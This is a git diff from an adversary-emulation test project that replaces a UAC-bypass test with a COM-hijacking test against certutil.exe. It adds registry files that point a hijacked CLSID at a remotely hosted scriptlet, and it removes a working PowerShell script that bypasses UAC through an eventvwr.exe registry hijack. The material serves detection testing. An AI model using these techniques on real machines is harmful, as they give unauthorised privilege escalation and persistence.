diff --git a/atomics/T1122/T1122.md b/atomics/T1122/T1122.md
index ae2a67e3..eb3d5540 100644
--- a/atomics/T1122/T1122.md
+++ b/atomics/T1122/T1122.md
@@ -16,19 +16,21 @@ Contributors: ENDGAME
## Atomic Tests
-- [Atomic Test #1 - PowerShell UAC Bypass](#atomic-test-1---powershell-uac-bypass)
+- [Atomic Test #1 - Component Object Model Hijacking](#atomic-test-1---component-object-model-hijacking)
-## Atomic Test #1 - PowerShell UAC Bypass
-PowerShell EventViewer Bypass by Matt Nelson
+## Atomic Test #1 - Component Object Model Hijacking
+Hijack COM Object used by certutil.exe
**Supported Platforms:** Windows
-#### Run it with `powershell`!
+#### Run it with `command_prompt`!
```
-Invoke-EventVwrBypass.ps1
+reg import ..\src\COMHijack.reg
+certutil.exe -CAInfo
+reg import ..\src\COMHijackCleanup.reg
```
diff --git a/atomics/T1122/T1122.yaml b/atomics/T1122/T1122.yaml
index 1f61424c..e9963d3e 100644
--- a/atomics/T1122/T1122.yaml
+++ b/atomics/T1122/T1122.yaml
@@ -1,15 +1,17 @@
---
attack_technique: T1122
-display_name: Bypass User Account Control
+display_name: Component Object Model Hijacking
atomic_tests:
-- name: PowerShell UAC Bypass
+- name: Component Object Model Hijacking
description: |
- PowerShell EventViewer Bypass by Matt Nelson
+ Hijack COM Object used by certutil.exe
supported_platforms:
- windows
executor:
- name: powershell
+ name: command_prompt
command: |
- Invoke-EventVwrBypass.ps1
+ reg import ..\src\COMHijack.reg
+ certutil.exe -CAInfo
+ reg import ..\src\COMHijackCleanup.reg
diff --git a/atomics/T1122/src/AtomicRedTeam.sct b/atomics/T1122/src/AtomicRedTeam.sct
new file mode 100755
index 00000000..161843f9
--- /dev/null
+++ b/atomics/T1122/src/AtomicRedTeam.sct
@@ -0,0 +1,25 @@
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/atomics/T1122/src/COMHijack.reg b/atomics/T1122/src/COMHijack.reg
new file mode 100755
index 00000000..f5b2cd62
--- /dev/null
+++ b/atomics/T1122/src/COMHijack.reg
@@ -0,0 +1,23 @@
+Windows Registry Editor Version 5.00
+[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
+@="AtomicRedTeam"
+[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID]
+@="{00000001-0000-0000-0000-0000FEEDACDC}"
+[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
+@="AtomicRedTeam"
+[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID]
+@="{00000001-0000-0000-0000-0000FEEDACDC}"
+[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
+@="AtomicRedTeam"
+[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32]
+@="C:\\WINDOWS\\system32\\scrobj.dll"
+"ThreadingModel"="Apartment"
+[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID]
+@="AtomicRedTeam.1.00"
+[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL]
+@="https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/COMHijackScripts/AtomicRedTeam.sct"
+[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID]
+@="AtomicRedTeam"
+[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}]
+[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}\TreatAs]
+@="{00000001-0000-0000-0000-0000FEEDACDC}"
diff --git a/atomics/T1122/src/COMHijackCleanup.reg b/atomics/T1122/src/COMHijackCleanup.reg
new file mode 100755
index 00000000..1313fad6
--- /dev/null
+++ b/atomics/T1122/src/COMHijackCleanup.reg
@@ -0,0 +1,5 @@
+Windows Registry Editor Version 5.00
+[-HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
+[-HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
+[-HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
+[-HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}]
diff --git a/atomics/T1122/src/Invoke-EventVwrBypass.ps1 b/atomics/T1122/src/Invoke-EventVwrBypass.ps1
deleted file mode 100644
index 4c119b03..00000000
--- a/atomics/T1122/src/Invoke-EventVwrBypass.ps1
+++ /dev/null
@@ -1,92 +0,0 @@
-function Invoke-EventVwrBypass {
-<#
-.SYNOPSIS
-
-Bypasses UAC by performing an image hijack on the .msc file extension
-Expected to work on Win7, 8.1 and Win10
-
-Only tested on Windows 7 and Windows 10
-
-Author: Matt Nelson (@enigma0x3)
-License: BSD 3-Clause
-Required Dependencies: None
-Optional Dependencies: None
-
-Source: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
-
-.PARAMETER Command
-
- Specifies the command you want to run in a high-integrity context. For example, you can pass it powershell.exe followed by any encoded command "powershell -enc "
-
-.EXAMPLE
-
-Invoke-EventVwrBypass -Command "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc IgBJAHMAIABFAGwAZQB2AGEAdABlAGQAOgAgACQAKAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAnAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAJwApACkAIAAtACAAJAAoAEcAZQB0AC0ARABhAHQAZQApACIAIAB8ACAATwB1AHQALQBGAGkAbABlACAAQwA6AFwAVQBBAEMAQgB5AHAAYQBzAHMAVABlAHMAdAAuAHQAeAB0ACAALQBBAHAAcABlAG4AZAA="
-
-This will write out "Is Elevated: True" to C:\UACBypassTest.
-
-#>
-
- [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')]
- Param (
- [Parameter(Mandatory = $True)]
- [ValidateNotNullOrEmpty()]
- [String]
- $Command,
-
- [Switch]
- $Force
- )
- $ConsentPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).ConsentPromptBehaviorAdmin
- $SecureDesktopPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).PromptOnSecureDesktop
-
- if($ConsentPrompt -Eq 2 -And $SecureDesktopPrompt -Eq 1){
- "UAC is set to 'Always Notify'. This module does not bypass this setting."
- exit
- }
- else{
- #Begin Execution
- $mscCommandPath = "HKCU:\Software\Classes\mscfile\shell\open\command"
- $Command = $pshome + '\' + $Command
- #Add in the new registry entries to hijack the msc file
- if ($Force -or ((Get-ItemProperty -Path $mscCommandPath -Name '(default)' -ErrorAction SilentlyContinue) -eq $null)){
- New-Item $mscCommandPath -Force |
- New-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null
- }else{
- Write-Warning "Key already exists, consider using -Force"
- exit
- }
-
- if (Test-Path $mscCommandPath) {
- Write-Verbose "Created registry entries to hijack the msc extension"
- }else{
- Write-Warning "Failed to create registry key, exiting"
- exit
- }
-
- $EventvwrPath = Join-Path -Path ([Environment]::GetFolderPath('System')) -ChildPath 'eventvwr.exe'
- #Start Event Viewer
- if ($PSCmdlet.ShouldProcess($EventvwrPath, 'Start process')) {
- $Process = Start-Process -FilePath $EventvwrPath -PassThru
- Write-Verbose "Started eventvwr.exe"
- }
-
- #Sleep 5 seconds
- Write-Verbose "Sleeping 5 seconds to trigger payload"
- if (-not $PSBoundParameters['WhatIf']) {
- Start-Sleep -Seconds 5
- }
-
- $mscfilePath = "HKCU:\Software\Classes\mscfile"
-
- if (Test-Path $mscfilePath) {
- #Remove the registry entry
- Remove-Item $mscfilePath -Recurse -Force
- Write-Verbose "Removed registry entries"
- }
-
- if(Get-Process -Id $Process.Id -ErrorAction SilentlyContinue){
- Stop-Process -Id $Process.Id
- Write-Verbose "Killed running eventvwr process"
- }
- }
-}
diff --git a/atomics/T1122/src/test.bat b/atomics/T1122/src/test.bat
new file mode 100755
index 00000000..06638ea6
--- /dev/null
+++ b/atomics/T1122/src/test.bat
@@ -0,0 +1,3 @@
+reg import COMHijack.reg
+certutil.exe -CAInfo
+reg import COMHijackCleanup.reg
diff --git a/atomics/index.md b/atomics/index.md
index 31a1876e..39532164 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -28,7 +28,7 @@
- Atomic Test #1: Change Default File Association [windows]
- T1109 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1122 Component Object Model Hijacking](./T1122/T1122.md)
- - Atomic Test #1: PowerShell UAC Bypass [windows]
+ - Atomic Test #1: Component Object Model Hijacking [windows]
- [T1136 Create Account](./T1136/T1136.md)
- Atomic Test #1: Create a user account on a Linux system [linux]
- Atomic Test #2: Create a user account on a MacOS system [macos]
@@ -141,7 +141,7 @@
- T1116 Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1109 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1122 Component Object Model Hijacking](./T1122/T1122.md)
- - Atomic Test #1: PowerShell UAC Bypass [windows]
+ - Atomic Test #1: Component Object Model Hijacking [windows]
- T1196 Control Panel Items [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1207 DCShadow](./T1207/T1207.md)
- Atomic Test #1: DCShadow - Mimikatz [windows]
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index e07ff70c..371590a3 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -13,7 +13,7 @@
- T1116 Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1109 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1122 Component Object Model Hijacking](./T1122/T1122.md)
- - Atomic Test #1: PowerShell UAC Bypass [windows]
+ - Atomic Test #1: Component Object Model Hijacking [windows]
- T1196 Control Panel Items [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1207 DCShadow](./T1207/T1207.md)
- Atomic Test #1: DCShadow - Mimikatz [windows]
@@ -167,7 +167,7 @@
- Atomic Test #1: Change Default File Association [windows]
- T1109 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1122 Component Object Model Hijacking](./T1122/T1122.md)
- - Atomic Test #1: PowerShell UAC Bypass [windows]
+ - Atomic Test #1: Component Object Model Hijacking [windows]
- [T1136 Create Account](./T1136/T1136.md)
- Atomic Test #3: Create a new user in a command prompt [windows]
- Atomic Test #4: Create a new user in PowerShell [windows]